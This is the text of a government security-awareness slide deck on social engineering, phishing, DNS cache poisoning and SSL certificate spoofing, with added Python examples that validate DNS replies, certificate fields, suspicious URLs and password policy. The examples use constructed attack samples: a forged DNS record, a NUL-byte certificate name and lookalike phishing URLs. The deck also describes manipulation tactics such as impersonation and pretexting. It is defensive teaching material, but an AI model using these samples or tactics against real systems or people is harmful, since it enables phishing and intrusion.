    • According to the Privacy Rights Clearinghouse, in one
      incident in 2009 Virginia provided individual
      notifications to 530,000 people
    • 530,000 x $0.50 = $265,000 (estimate for stamps
      and envelopes)
  • Social Engineering
    • Spear phishing user accounts throughout the
      Commonwealth


126
Commonwealth Incidents
  • Malware
    • 66 over the last year
  • Major Outages
  • Unauthorized Access Attempts
    • 3 instances of Virginia Agencies in 2009 appear
      on the Privacy Rights Clearinghouse "A Chronology of
      Data Breaches" website.


127
The Stop and Rob
"Charlie 16 to dispatch, we are currently 10-8 at
the Stop and Rob on 2400 block of Jeff Davis."
128
The Stop and Rob
[Diagram: Developer, Firewall, Access Control, Application Logic, HTTP/HTTPS, DATA]
129
The Stop and Rob
[Diagram: Firewall, Access Control, Application Logic, Bad Guy, Developer, DATA]
130
How Do We Avoid Security Violations?
  • 20 Critical Controls: a prioritized baseline of
    information security measures and controls
  • Boundary Defense
  • Avoiding Insecure Network Designs
  • Patch Management
  • User Awareness
  • Least Privilege
  • End Point or Client Side Security

NOTE - SANS 20 Critical Security Controls -
Version 2.1
131
How Do We Avoid Security Violations?
  • Secure SDLC Processes
  • Security As Weighted Factor During the
    Procurement Process
  • Application Security
  • Security Skill Assessment and Appropriate Training

132
Summary
  • We are still learning our lessons
  • Attackers are more advanced than ever before
  • Security must start from the beginning
  • The Commonwealth is a target

133
Social Engineering: Building Bridges to
Confidential Data
  • Bob Baskette
  • CISSP-ISSAP, CCNP/CCDP, RHCT
  • Commonwealth Security Architect

134
Why Information Security Matters
  • Computer systems have value both to their owners
    and to the malicious individuals who want the
    data stored on them and the processing power
    they provide
  • Malicious individuals may also take over a
    computer system to store illegal material or to
    launch attacks that will be traced back to the
    compromised system rather than to the attacker

135
Social Engineering
  • The use of influence and persuasion to deceive
    people for the purpose of obtaining information
    or persuading a victim to perform some action
  • Based on the building of inappropriate trust
    relationships
  • Will target Help Desk personnel, onsite
    employees, and contractors
  • Is one of the most dangerous attacks because it
    targets people rather than technology, so
    technical controls alone do not stop it

136
Factors in Social Engineering
  • Desire to be helpful
  • Tendency to trust people
  • Fear of getting in trouble
  • Art of Manipulation (the ability to blend-in)

137
Social Engineering Behavioral Types
  • Scarcity
    • Belief that an item is in short supply
    • Commonly used by marketing
  • Authority
    • Based on the premise of power
  • Liking
    • Based on the fact that people tend to help
      people they like

138
Social Engineering Behavioral Types
  • Consistency
    • Based on the fact that people like to be
      consistent
  • Social Validation
    • If one person does it, others will follow
  • Reciprocation
    • One good turn deserves another

139
Social Engineering Attack Types
  • Human-based (Person-to-Person)
  • Computer-Based (Automated)

140
Human-based (Person-to-Person)
  • Uses the following techniques
  • Shoulder surfing
  • Dumpster diving
  • Impersonation
  • Intimidation
  • Using third-party approval

141
Human-based (Person-to-Person)
  • Impersonation (Masquerading)
    • Attacker pretends to be someone else
    • Can impersonate a new employee, valid user,
      business client, janitor, delivery person, or
      mail room person
    • Carries a higher risk, since the attacker is
      physically inside the facility perimeter
  • Intimidation (Posing as an important user)
    • Attacker pretends to be an important user
    • Works on the belief that it is not good to
      question authority
  • Using third-party authorization
    • Attacker convinces the victim that the attacker
      has approval from a third party that is an
      authoritative source
    • Works on the belief that most people are good
      and truthful

142
Human-based (Person-to-Person)
  • Reverse Social Engineering
    • Considered the most difficult type of Social
      Engineering attack; requires a tremendous
      amount of preparation and skill
    • The attacker creates a problem and then
      positions himself as the person who can fix it,
      so the victim initiates the contact and
      volunteers information
    • Acting as help-desk or admin staff to request
      information
    • Sabotaging the victim's equipment and then
      offering to fix the problem; difficult to
      execute because the first step is the sabotage
      itself
    • The target could be an external utility such
      as a phone line
    • Delivering defective equipment and then
      offering to repair it
    • Attaching a business card to a toner box or
      laptop case

143
Computer-Based (Automated)
  • Phishing and Spam
  • Email attachments
  • Fake websites
  • Pop-up messages
  • Drive-by downloads
  • DNS cache poisoning
  • Spoofed SSL certificates

144
SPAM and the Flying Circus
  • Spam is the intentional abuse or misuse of
    electronic messaging systems to send unsolicited
    bulk messages
  • Spam is normally associated with e-mail, but
    other transmission types can carry it too, such
    as instant messaging, Usenet newsgroups, Web
    search engines, blogs, mobile phone messaging,
    Internet forums, and fax transmissions
  • Spam remains economically viable because senders
    have almost no operating costs beyond managing
    their mailing lists, and it is difficult to hold
    them accountable for their mass mailings
  • Today, spam is increasingly sent from bot
    networks; many modern worms install a backdoor
    that gives the spammer access to the computer
    and lets it be used for malicious purposes
  • Spam e-mail chains promising good fortune if the
    chain is not broken are still very popular

145
Phishing Basics
  • Phishing campaigns use either email or malicious
    web sites to solicit personal information from
    targeted individuals
  • Attackers attempt to replicate the look and
    format of emails from reputable companies,
    government agencies, or financial institutions
  • The Phishing messages appear to come from popular
    social networking sites, auction sites, online
    payment processors or IT Administrators to entice
    the unsuspecting public to respond
  • Phishing campaigns that target specific
    categories or groups of users are known as Spear
    Phishing Campaigns

146
Phishing Basics
  • People respond without thinking to things that
    seem important
  • Email subject lines worded to create anxiety or
    self-doubt, such as "Do you trust her/him?" or
    "Is she/he cheating on you?", usually entice
    immediate action
  • Email with the subjects such as Your bank
    account has been suspended or There is a
    problem with your bank account will usually get
    instant attention and prompt most people to click
    on the listed URL to determine what has happened

147
Pop-up messages
  • Can prompt victim for numerous types of
    information
  • Can be very successful since the message appears
    to be a system message referencing loss of access
    or malicious software detection
  • Has been used successfully to install malicious
    software under the pretense of removing malicious
    software

148
Drive-By Downloads
  • Uses legitimate websites to infect end users
  • The legitimate website is compromised by a
    malicious individual, who adds hidden frames,
    malicious URLs, or malicious scripts to it
  • The user's browser retrieves the content behind
    the malicious URL or script and becomes infected
    with malicious software, with no action by the
    user beyond visiting the page
  • Clickjacking: use of hidden frames on web pages
    to trick the user into clicking on malicious URLs

149
DNS Cache Poisoning
  • Uses forged DNS responses to redirect users to
    malicious websites
  • Uses several techniques to get malicious
    IP-address records accepted and cached by
    legitimate DNS servers
  • Removes the need to trick a user into visiting a
    malicious website, since the malicious IP address
    is handed out by the legitimate DNS server the
    user already trusts

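The slide above describes the attack from the outside; the following is an added example (not part of the presentation) of what a caching resolver must check before it trusts a reply: the transaction ID and source port must match the query it actually sent, the question must match, and only records inside the zone the queried server is authoritative for (the "bailiwick") are cached. The packets, the pending-query state and the forged reply are all constructed here; the parser is deliberately minimal and does not handle name compression.

```python
# Added example, not from the presentation: acceptance checks a caching resolver
# applies to a DNS response, run against constructed packets.
import struct

A_RECORD = 1


def encode_name(name):
    """DNS wire format: length-prefixed labels, terminated by a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg, off):
    """Returns (name, offset after the name). Compression pointers are not
    supported; the constructed packets below do not use them."""
    labels = []
    while True:
        n = msg[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0:
            raise ValueError("compression pointer not supported in this example")
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n


def rr(name, rdata, ttl=300, rtype=A_RECORD):
    """One resource record: NAME TYPE CLASS(IN) TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def build_response(txid, qname, answers, authority=(), additional=()):
    """Header (flags: response, recursion desired/available) + one question + records."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), len(authority), len(additional))
    question = encode_name(qname) + struct.pack("!HH", A_RECORD, 1)
    return header + question + b"".join(list(answers) + list(authority) + list(additional))


def parse_response(msg):
    """Returns (txid, question name, [(section, name, type, rdata), ...])."""
    txid, _flags, _qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    qname, off = decode_name(msg, off)
    off += 4  # QTYPE and QCLASS
    records = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = decode_name(msg, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            records.append((section, name, rtype, msg[off:off + rdlen]))
            off += rdlen
    return txid, qname, records


def in_bailiwick(name, zone):
    """A record may only be cached if its owner name is at or below the zone
    the queried server is authoritative for."""
    name, zone = name.lower(), zone.lower()
    return name == zone or name.endswith("." + zone)


def accept_response(pending, msg, src_port):
    """pending describes the outstanding query: its random txid, the random
    source port it left from, the name asked, and the zone of the server asked.
    Returns (records_to_cache, reason); records_to_cache is None on rejection."""
    txid, qname, records = parse_response(msg)
    if txid != pending["txid"] or src_port != pending["port"]:
        return None, "transaction id or source port does not match the outstanding query"
    if qname.lower() != pending["qname"].lower():
        return None, "question section does not match"
    keep = [r for r in records if in_bailiwick(r[1], pending["zone"])]
    return keep, "dropped %d out-of-bailiwick record(s)" % (len(records) - len(keep))


# Constructed scenario: the resolver asked example.com's server for www.example.com.
PENDING = {"txid": 0x1A2B, "port": 40321, "qname": "www.example.com", "zone": "example.com"}

# Constructed forged reply: a plausible answer plus an "additional" record that
# tries to plant an address for a name outside example.com.
FORGED = build_response(0x1A2B, "www.example.com",
                        answers=[rr("www.example.com", bytes([192, 0, 2, 10]))],
                        additional=[rr("www.bank.test", bytes([198, 51, 100, 66]))])

if __name__ == "__main__":
    print(accept_response(PENDING, FORGED, 40321))  # keeps the answer, drops the planted record
    print(accept_response(PENDING, FORGED, 53))     # wrong source port: rejected outright
```

The two outcomes show why random transaction IDs and source ports matter: a forger who cannot see the query has to guess both, and even a correct guess only lets in records the queried server is entitled to speak for.
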
150
SSL Certificate Spoofing
  • MD5 Hash Collision/Digital Signature transfer
  • A vulnerability in the Internet Public Key
    Infrastructure (PKI) used to issue digital
    certificates for secure websites has been
    identified
  • Exploits a weakness in the MD5 cryptographic hash
    function that allows the construction of two
    different certificates with the same MD5 hash, so
    a CA's signature over the legitimately issued one
    is also valid for the other
  • This vulnerability can be used to create a rogue
    Certification Authority (CA) certificate trusted
    by all common web browsers
  • Such a rogue certificate can be used to
    impersonate any website on the Internet,
    including banking and e-commerce sites secured
    using the HTTPS protocol
  • The attack depends on a CA still signing with
    MD5, so clients should reject MD5-signed
    certificates and CAs should sign with SHA-2

151
SSL Certificate Spoofing/Piggybacking
  • Piggybacking SSL Certificates
    • Allows multiple phishing attacks on a single
      certificate
    • A single compromised Web server with a valid SSL
      certificate can be used to host multiple
      phishing sites, since visitors to the phishing
      sites erroneously believe they have a secure
      connection with the original website
    • The certificate is genuine, just issued to the
      compromised server's domain rather than to the
      impersonated site, so the padlock alone proves
      nothing; visitors can only detect the problem by
      reviewing the certificate or by relying on other
      visual indicators (such as the extended
      validation SSL certificate display)

152
SSL Certificate Spoofing/URL Obfuscation
  • NULL character attack
    • Convinces the end user that a certificate has
      been issued to a different domain than the one
      to which it was actually issued
    • The certificate's name field is an
      explicit-length ASN.1 string and may contain a
      NUL byte; a client that compares names with
      C-string semantics stops at the NUL, so a
      certificate for a domain the attacker controls
      appears to be for exactly the targeted site's
      domain name
    • This technique is used in a Man-in-the-Middle
      attack, with the null-character certificate
      used to produce the false certificates as needed
  • Leading zero attack
    • Similar to the NULL character attack
    • The certificate carries a field with a
      redundant leading zero in its encoding; a
      strict parser (the CA) and a lenient one (the
      browser) then read different values from the
      same bytes

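Both attacks on the slides above come down to two parsers disagreeing about the same certificate bytes. The following is an added example (not from the presentation) that reproduces each disagreement on constructed data: a NUL-prefixed CommonName matched with C-string semantics versus a length-aware check, and an OBJECT IDENTIFIER decoded strictly versus leniently. The domain names are constructed; the reading of the "leading zero" attack as a redundant 0x80 octet in a base-128 OID sub-identifier (forbidden by X.690) is an assumption about which encoding the slide means.

```python
# Added example, not from the presentation: the two certificate-parsing
# ambiguities described on the slides, against constructed fields.
import re

# Constructed CommonName exactly as it sits in the DER: an explicit-length string
# that happens to contain a NUL byte. The attacker controls attacker.example.
ATTACK_CN = b"www.bank.example\x00.attacker.example"


def cn_matches_host_vulnerable(cn, host):
    """Emulates a strcmp()-style check: the comparison stops at the first NUL,
    so only 'www.bank.example' is ever seen."""
    c_string = cn.split(b"\x00", 1)[0].decode("ascii", "replace")
    return c_string.lower() == host.lower()


def cn_matches_host_safe(cn, host):
    """Length-aware check: the whole CN must be a well-formed hostname (which
    excludes NUL and every other control byte) and must match entirely."""
    try:
        text = cn.decode("ascii")
    except UnicodeDecodeError:
        return False
    if not re.fullmatch(r"[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?", text):
        return False
    return text.lower() == host.lower()


def decode_oid(content, strict=True):
    """Decode the content octets of an ASN.1 OBJECT IDENTIFIER. Each
    sub-identifier is base-128, high bit = continuation. X.690 forbids a
    leading 0x80 octet (an encoded leading zero); a lenient decoder accepts it
    and yields the same value as the minimal encoding."""
    subids, value, at_start = [], 0, True
    for i, b in enumerate(content):
        if strict and at_start and b == 0x80:
            raise ValueError("non-minimal sub-identifier at offset %d" % i)
        value = (value << 7) | (b & 0x7F)
        at_start = False
        if not b & 0x80:
            subids.append(value)
            value, at_start = 0, True
    if not at_start or not subids:
        raise ValueError("truncated OID")
    first = min(subids[0] // 40, 2)  # the first octet packs the first two arcs
    return ".".join(str(n) for n in [first, subids[0] - 40 * first] + subids[1:])


CN_OID = "2.5.4.3"


def is_cn_attribute(oid_content, strict):
    """How a strict (CA-side) or lenient (browser-side) parser classifies an
    attribute type. When they disagree, the CA never sees the name it signs."""
    try:
        return decode_oid(oid_content, strict) == CN_OID
    except ValueError:
        return False


MINIMAL_CN_OID = b"\x55\x04\x03"           # 2.5.4.3 as every CA expects it
LEADING_ZERO_CN_OID = b"\x55\x04\x80\x03"  # same value with a redundant leading zero

if __name__ == "__main__":
    print("vulnerable match:", cn_matches_host_vulnerable(ATTACK_CN, "www.bank.example"))
    print("safe match:     ", cn_matches_host_safe(ATTACK_CN, "www.bank.example"))
    print("CA sees CN:     ", is_cn_attribute(LEADING_ZERO_CN_OID, strict=True))
    print("browser sees CN:", is_cn_attribute(LEADING_ZERO_CN_OID, strict=False))
```

The fix in both cases is the same discipline: validate the field against its declared length and the encoding rules before using it, and reject anything that is not the one canonical encoding rather than guessing what was meant.
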
153
Social Engineering Mitigation Methods
  • User Security Awareness and Training
  • Policies
  • Procedures

154
Security Awareness Training
  • Increases the understanding of security and the
    threat of Social Engineering
  • Training should occur during employee enrollment
    and at regular intervals
  • Training could be outsourced to a third party,
    since many employees give more weight to
    third-party input

155
Email Security Awareness Training
  • The best mitigation mechanism for SPAM and
    Phishing emails is the delete button
  • To mitigate the potential threat presented by a
    spam email campaign, it is recommended that you
    remind your users to never open attachments or
    click links contained in unsolicited email
    messages
  • Advise them, if possible, to check with the
    person who supposedly sent the email to make sure
    that it is legitimate prior to opening any
    attachments
  • Scan any attachments at the network perimeter as
    well as the desktop with anti-virus software
    before opening the attachment
  • Never use contact information taken from the
    email itself or from a web site it links to; look
    the organization's number or address up
    independently

156
Email Security Awareness Training
  • Also advise users not to reveal personal or
    financial information in an email, and not to
    respond to email solicitations for this
    information
  • Always examine the URL of a web site. Malicious
    web sites may look identical to a legitimate
    site, but the URL may use a variation in spelling
    or a different domain extension such as .com vs.
    .net
  • An additional step to help mitigate the risk of a
    phishing campaign is to remove local
    administrative rights from users (the
    least-privilege best practice), so that malware a
    user is tricked into launching cannot take over
    the whole machine
  • Only display functional/group email addresses on
    public websites to limit the amount of
    SPAM/Phishing emails sent to individuals

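The "always examine the URL" advice on the slides above can be turned into a check that catches the tricks they list: a different domain extension, a variation in spelling, and the trusted name buried inside someone else's domain. The following is an added example (not from the presentation); the allowlist and the URLs are constructed, and the two-label rule for the registrable domain is a simplification that real code would replace with the Public Suffix List.

```python
# Added example, not from the presentation: a phishing-URL checker implementing
# the URL-inspection advice, with a constructed allowlist and constructed URLs.
from urllib.parse import urlsplit

# Constructed allowlist of registrable domains the user legitimately deals with.
TRUSTED_DOMAINS = ("bankofamerica.com", "virginia.gov")

# Digits and symbols commonly substituted for letters in lookalike names.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "|": "l"})


def registrable_domain(host):
    """Last two labels of the host. Simplification: production code should use
    the Public Suffix List so that names like example.co.uk are handled."""
    return ".".join(host.split(".")[-2:])


def classify_url(url, trusted=TRUSTED_DOMAINS):
    """Returns ("ok", registrable domain) or ("suspicious", reason)."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return "suspicious", "no host name in URL"
    # user@host: the browser connects to what follows the @, not what precedes it
    if parts.username is not None:
        return "suspicious", "user@host trick: browser will go to %r, not %r" % (host, parts.username)
    reg = registrable_domain(host)
    if reg in trusted:
        if parts.scheme != "https":
            return "suspicious", "trusted domain but not https"
        return "ok", reg
    labels = host.split(".")
    folded = host.translate(CONFUSABLES).replace("-", "")
    for t in trusted:
        name = t.split(".")[0]
        if reg.split(".")[0] == name:          # bankofamerica.net instead of .com
            return "suspicious", "%s with a different extension: %s instead of %s" % (name, reg, t)
        if name in labels:                     # bankofamerica.com.login-verify.net
            return "suspicious", "%s used as a subdomain of %s" % (t, reg)
        if name in folded:                     # bank0famerica.com, bank-of-america.com
            return "suspicious", "lookalike spelling of %s: %s" % (t, host)
    return "suspicious", "unknown domain %s" % reg


if __name__ == "__main__":
    for u in ("https://www.bankofamerica.com/login",
              "https://www.bankofamerica.com.login-verify.net/",
              "https://www.bankofamerica.net/",
              "https://www.bank0famerica.com/",
              "https://www.bankofamerica.com@evil.example/"):
        print(classify_url(u))
```

The subdomain and user@host cases are the ones users most often miss by eye, because the trusted name is genuinely present in the address bar; the check only trusts the registrable domain, which is the part the attacker cannot forge.
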
157
Physical Security Awareness Training
  • Ensure all visitors are always escorted
  • Remind employees not to allow Piggy-Back access
  • Remind employees not to allow an unknown person
    to wander the facility
  • Never allow a visitor, client, or other persons
    to simply connect a computer to the internal
    network without prior approval

158
Credential Security Awareness Training
  • Protection of account credentials
    • Never give out or share passwords
    • Use strong passwords for any application
      requiring a login
    • Use unique passwords for every application and
      avoid using the same password for similar
      applications
  • Carefully consider the questions used to verify
    the user for automated password resets
    • Most automated systems use a common set of
      questions for password reset, and the answers
      to these questions can be found in public
      records or on-line
    • Place of birth, mother's maiden name, and
      school information are available in public
      records
    • Friends, color preference, hobbies, and pet
      information are often found on social network
      sites
    • Make of first car can be guessed from
      purchasing trends

159
Identity Security Awareness Training
  • Protection of Personally Identifiable Information
    within Social Networks
    • Select your screen name carefully: do not
      include any information such as your name, age,
      sex, city, or employer
    • Never post anything you would not want to have
      distributed publicly
    • Never post personally identifying information
      such as SSN, first and last name, address,
      driver's license, telephone number and e-mail
      address
    • When establishing your account, adjust the
      profile's privacy settings until you are
      comfortable with the amount of protection they
      provide

160
Policies
  • Must clarify information access controls
  • Detail rules for setting up accounts
  • Define access approval
  • Define process for changing passwords

161
Policies
  • Define policy for physical destruction of devices
    and media
    • Hard drives
    • CD/DVDs
  • Define physical control selection and
    implementation
    • Locks
    • Access controls
    • How visitors are authorized and escorted

162
Employee Hiring and Termination Policies
  • Hiring should include background checks,
    verifying educational records, and Non-Disclosure
    Agreements
  • Termination should include exit interviews,
    review of NDA, suspension of network access, and
    checklist for equipment return

163
Help Desk Procedures
  • Used to make sure that there is a standard
    procedure for employee verification
  • Call-back to the employee's number on record can
    be used to verify the caller; caller ID alone is
    not a reliable check, since it is easily spoofed
  • Can also use Cognitive Passwords
    • Arcane information that only the user should
      know

164
Password Change Policy
  • Require strong passwords
    • Must not contain any part of the account name
    • Must be at least 8 characters long
    • Must contain characters from at least three of
      the four classes:
      • Numbers
      • Uppercase letters
      • Lowercase letters
      • Non-alphanumeric symbols
  • Require password aging
  • Prohibit password reuse

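The policy on the slide above is concrete enough to implement. The following is an added example (not from the presentation) that checks a candidate password against every rule listed: length, character classes, no fragment of the account name, no reuse against a salted-hash history, and aging. The figures the slide leaves open are assumptions and are marked as such in the code: a fragment of the account name means any run of three or more letters, the history depth is ten, and the maximum age is ninety days.

```python
# Added example, not from the presentation: a checker for the slide's password
# policy. Values the slide does not fix are assumptions, marked below.
import hashlib
import hmac
import os
import re
from datetime import date, timedelta

MIN_LENGTH = 8
MIN_CLASSES = 3        # at least three of the four character classes
NAME_FRAGMENT = 3      # assumption: any 3+ letter run of the account name is "part of" it
HISTORY_DEPTH = 10     # assumption: the slide says "prohibit reuse" without a depth
MAX_AGE_DAYS = 90      # assumption: the slide says "require aging" without a figure
PBKDF2_ROUNDS = 100_000


def character_classes(password):
    """Number of the four classes (digits, upper, lower, symbols) present."""
    return sum([
        any(c.isdigit() for c in password),
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(not c.isalnum() for c in password),
    ])


def contains_account_name(password, account):
    """True if any NAME_FRAGMENT-long run of a letter token of the account
    name (e.g. 'smi' from 'jsmith') appears in the password, ignoring case."""
    pw = password.lower()
    for token in re.split(r"[^a-z]+", account.lower()):
        for i in range(len(token) - NAME_FRAGMENT + 1):
            if token[i:i + NAME_FRAGMENT] in pw:
                return True
    return False


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256: what the history stores, never the password."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def in_history(password, history):
    """history: [(salt, digest), ...] oldest first; only the last HISTORY_DEPTH count."""
    return any(hmac.compare_digest(hash_password(password, salt)[1], digest)
               for salt, digest in list(history)[-HISTORY_DEPTH:])


def check_password(password, account, history=()):
    """Returns the list of policy violations; an empty list means acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if contains_account_name(password, account):
        problems.append("contains part of the account name")
    if character_classes(password) < MIN_CLASSES:
        problems.append("uses fewer than %d of the 4 character classes" % MIN_CLASSES)
    if in_history(password, history):
        problems.append("matches one of the last %d passwords" % HISTORY_DEPTH)
    return problems


def password_expired(last_changed, today=None):
    """Aging rule. Dates are ISO strings ('2009-07-01'); today defaults to now."""
    changed = date.fromisoformat(last_changed)
    now = date.fromisoformat(today) if today else date.today()
    return now - changed > timedelta(days=MAX_AGE_DAYS)


if __name__ == "__main__":
    print(check_password("smith2009", "jsmith"))          # name fragment + too few classes
    print(check_password("Correct-Horse9", "jsmith"))     # [] : acceptable
    old = [hash_password("Winter2009!")]
    print(check_password("Winter2009!", "jsmith", old))   # reuse
    print(password_expired("2009-07-01", today="2009-11-02"))
```

Storing only salted, iterated hashes in the history is what makes the reuse check safe to keep: an attacker who obtains the history file gains a list of slow hashes, not a list of the user's previous passwords.
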
165
Employee Identification
  • ID badges give a clear indication of authorized
    personnel
  • Guests should also wear temporary ID badges
  • Guests should be required to sign-in and sign-out
  • Anyone without a badge should be questioned and
    escorted to the proper facility personnel

166
Privacy Policies
  • Employees and customers have a certain
    expectation with regard to privacy
  • The privacy policy should be posted on the public
    website

167
Laws and Regulations
  • 4th Amendment to the United States Constitution
  • Electronic Communications Privacy Act of 1986
    • Protects email and voice communications
  • HIPAA (Health Insurance Portability and
    Accountability Act)
  • FERPA (Family Educational Rights and Privacy Act)
    • Privacy rights to students over 18
  • European Union data protection law
    • Protects personal data

168
Data Classification Systems
  • Can help prevent Social Engineering
  • Can be used to define what information is most
    critical
  • Can be used to gain end-user compliance
  • Governmental Information Classification System
  • Designed to protect confidentiality of
    information
  • Commercial Information Classification System
  • Focused on the integrity of information

169
Governmental Information Classification System
  • Unclassified
    • Information is not sensitive and does not need
      to be protected
    • The loss of the information would not cause
      damage
  • Confidential
    • Information is sensitive and its disclosure
      could result in some damage
    • Requires a safeguard against disclosure
  • Secret
    • Information classified as secret has greater
      importance than confidential data
    • Disclosure would result in serious damage
    • May result in loss of significant scientific or
      technical development
  • Top-Secret
    • Information that requires the most protection
    • Disclosure would be catastrophic

170
Commercial Information Classification System
  • Public
    • Similar to unclassified information
    • Disclosure would not result in damage
  • Sensitive
    • Information requires controls to prevent
      release to unauthorized parties
    • Disclosure would result in some damage
  • Private
    • Information is primarily personal in nature
    • Can include employee or medical records
  • Confidential
    • Information has the most sensitive rating
    • Information is required to keep the company
      competitive
    • The information should never be released

171
Commonwealth Security Information Resource Center
  • http://www.csirc.vita.virginia.gov
  • Two Main Goals
    • Create a place to provide security information
      that is relevant to the Commonwealth
      • Includes security topics within the COV
        government
      • Addresses topics for those with interests in
        the security community: citizens, businesses,
        other states, etc.
    • Create a source for providing threat data to
      third parties
      • Summary threat data for public viewing
      • Detailed threat data available for
        appropriate parties

172
Security Information
  • Types of information posted
    • Security advisories
      • Advisories affecting the Commonwealth
        government computing environment
    • Phishing scams
      • Attempts to gather information from users
        that will be useful for malicious activity
    • Information security tips
      • How to integrate security into daily activity
    • News
      • The latest news about information security
        that would be useful to the government and
        its constituents
    • Threat data
      • Information showing statistics about the top
        attackers targeting the Commonwealth

173
Security Research URLs
  • Internet Storm Center
    • http://isc.sans.org/
  • SANS Reading Room
    • https://www.sans.org/reading_room/
  • OWASP
    • http://www.owasp.org/index.php/Main_Page
  • Security Focus
    • http://www.securityfocus.com/
  • US-CERT
    • http://www.us-cert.gov
  • Team Cymru
    • http://www.team-cymru.org/

174
Questions???
  • For more information, please contact
    CommonwealthSecurity@VITA.Virginia.Gov
  • For more information on topics discussed in this
    presentation: Bob.Baskette@VITA.Virginia.GOV
  • Thank You!